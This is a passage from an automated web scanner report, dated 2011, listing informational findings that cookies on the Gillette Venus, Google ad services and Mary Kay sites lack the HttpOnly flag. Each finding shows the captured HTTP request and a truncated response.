User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.2.10.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:34 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:34 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 1552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...

13.210. http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/products/refillables/embrace/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/products/refillables/embrace/index.jsp HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/search/index.jsp?q=razorphonehelpfaq
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; bvgacefRatingsAndReviews=true; preferredLocale=en_US; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.7.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:37 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:37 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 89549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

13.211. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/products/refillables/embrace_purple/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949 HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:32 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:32 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 81708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

13.212. http://www.gillettevenus.com/en_US/razor_finder/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/razor_finder/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/razor_finder/index.jsp HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929; preferredLocale=en_US; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.3.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; bvgacefRatingsAndReviews=true

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:24 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:24 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 12747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...

13.213. http://www.gillettevenus.com/en_US/search/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/search/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/search/index.jsp?q=razor+phone+help+faq HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/razor_finder/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; bvgacefRatingsAndReviews=true; preferredLocale=en_US; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.5.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 16:46:33 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:33 GMT; Path=/
Location: http://www.gillettevenus.com/en_US/search/index.jsp?q=razorphonehelpfaq
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Connection: close


13.214. http://www.googleadservices.com/pagead/aclk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=CtEX85TxmTsNxpbOIAqW22IkPttDa9QGe_9W5HZeZwLlECAAQASgDUI7Oh7H______wFgyZ7-hsij_BqgAe7Jrv8DyAEBqgQcT9A90r-y9GTuo8AIONsgAR0WTUTlHQBwswxg1g&ved=0CAgQ0Qw&val=ChAyNmVhN2ZlZjBhNmNmNDNiELDC9fIEGgiq4KTBfyLUpSABKAAw88uL57LFh-j1ATjy4fjyBED7x5jzBA&sig=AOD64_2gBFwMK1AEYNxHS3sGMa4DnXPf0Q&adurl=http://www.volusion.com/%3F_kk%3D%252Becommerce%2520%252Bsolution%26_kt%3D3fda914a-c56d-407d-b8c6-0b1636cef4d3 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CocBQ3RFWDg1VHhtVHNOeHBiT0lBcVcyMklrUHR0RGE5UUdlXzlXNUhaZVp3TGxFQ0FBUUFTZ0RVSTdPaDdIX19fX19fd0ZneVo3LWhzaWpfQnFnQWU3SnJ2OER5QUVCcWdRY1Q5QTkwci15OUdUdW84QUlPTnNnQVIwV1RVVGxIUUJ3c3d4ZzFnEhMIp7veufiIqwIVET2DCh1iBQjVGAEg5qTVlr6Y98iGAUgB; expires=Thu, 06-Oct-2011 15:31:58 GMT; path=/pagead/conversion/1072407790/
Cache-Control: private
Location: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKe73rn4iKsCFRE9gwodYgUI1Q
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 06 Sep 2011 15:31:58 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


13.215. http://www.marykay.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?pid=mk HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 137
Content-Type: text/html; charset=utf-8
Location: /default.aspx?pid=mk
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: Subsidiary=US; path=/
Set-Cookie: TLTHID=9C5046FD4D123B0E95A0D3931B51113E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:44 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:45 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/default.aspx?pid=mk">here</a>.</h2>
</body></html>

13.216. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /CONTENT/HPflash/Thumbs/tb_eyebundles.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CONTENT/HPflash/Thumbs/tb_eyebundles.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 880
Content-Type: image/jpeg
Last-Modified: Tue, 07 Jun 2011 19:44:24 GMT
Accept-Ranges: bytes
ETag: "8661ea4d4b25cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=B0890FBE43C33E288B82AEB1B9B92B68; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................#..
...[SNIP]...

13.217. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /CONTENT/HPflash/Thumbs/tb_makeupartist.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CONTENT/HPflash/Thumbs/tb_makeupartist.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 960
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:22:36 GMT
Accept-Ranges: bytes
ETag: "5fe4339c621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D17FE5DF44B2B04AF2B926961FD1F468; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................#..
...[SNIP]...

13.218. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 920
Content-Type: image/jpeg
Last-Modified: Mon, 15 Aug 2011 19:40:43 GMT
Accept-Ranges: bytes
ETag: "ff998738835bcc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0F87CA454A59967B490C06993C603D8E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................#..
...[SNIP]...

13.219. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /CONTENT/HPflash/Thumbs/tb_twrandr.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CONTENT/HPflash/Thumbs/tb_twrandr.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 848
Content-Type: image/jpeg
Last-Modified: Mon, 01 Aug 2011 21:07:50 GMT
Accept-Ranges: bytes
ETag: "5da24128f50cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CCFC47FF43ECAF98B4F799BC3EFBF379; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................#..
...[SNIP]...

13.220. http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Common/SiteCatalyst/marykaycom/s_code.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Common/SiteCatalyst/marykaycom/s_code.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 41434
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 12:43:01 GMT
Accept-Ranges: bytes
ETag: "8078f2902342cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

/* SiteCatalyst code version: H.23.3.
Copyright 1996-2011 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES ***********
...[SNIP]...

13.221. http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/245_eyeColorBundle.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Content/HPflash/245_eyeColorBundle.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 45207
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 02 Jun 2011 09:19:26 GMT
Accept-Ranges: bytes
ETag: "9b534f2b621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C626A75243F4FAE68012C595A3FF22D3; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

CWS.....x....XT..?z..F@BJBJRPzP.E:...nI.A....T..AB.$.)I.K    ......../.|..............9{.....X...9....j.h.....7.H.....a........9&/.{G71.$.l...,.......y.....O@TT.._.OP....q.vt7..qtca.bB[.a.f.j..n....*..u
...[SNIP]...

13.222. http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/254_makeUpArtistLooks.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Content/HPflash/254_makeUpArtistLooks.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=A54BE6714B423AFBADF1DD9C59C8A29F; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 47134
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 02 Jun 2011 09:19:26 GMT
Accept-Ranges: bytes
ETag: "6318542b621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2FCCB00347201A4BA3241398CB9DCDDF; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:46:00 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:46:00 GMT; path=/

CWS.Z...x...u\T..7~.$.)....i..i....SdDAE:..n..TA..EiAD@EDx.........{.?..>w......k...k.....
.t..."p....... .J#2...[Z..K.P.:9:{..-.j[OOWAvv...6.n6.w.vN...v..v..VP............Z.
.A...........
.63w.....
...[SNIP]...

13.223. http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/324m_shopYourWay.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Content/HPflash/324m_shopYourWay.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 33387
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 01 Sep 2011 15:00:31 GMT
Accept-Ranges: bytes
ETag: "4a6ad5e4b768cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C7F280CB4F77F9D1ABACB09CB795199D; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

CWS.....x....<........=2".....BB    QQ..[.k6.^...%.B..l.R....-iP.E.^....................|..y....y..uC.]    ...@J.......q``@..D.`.     .|.....{1...yzy.@..p....-..x......8?......h..[....
..

..^..`.R...X...y....
...[SNIP]...

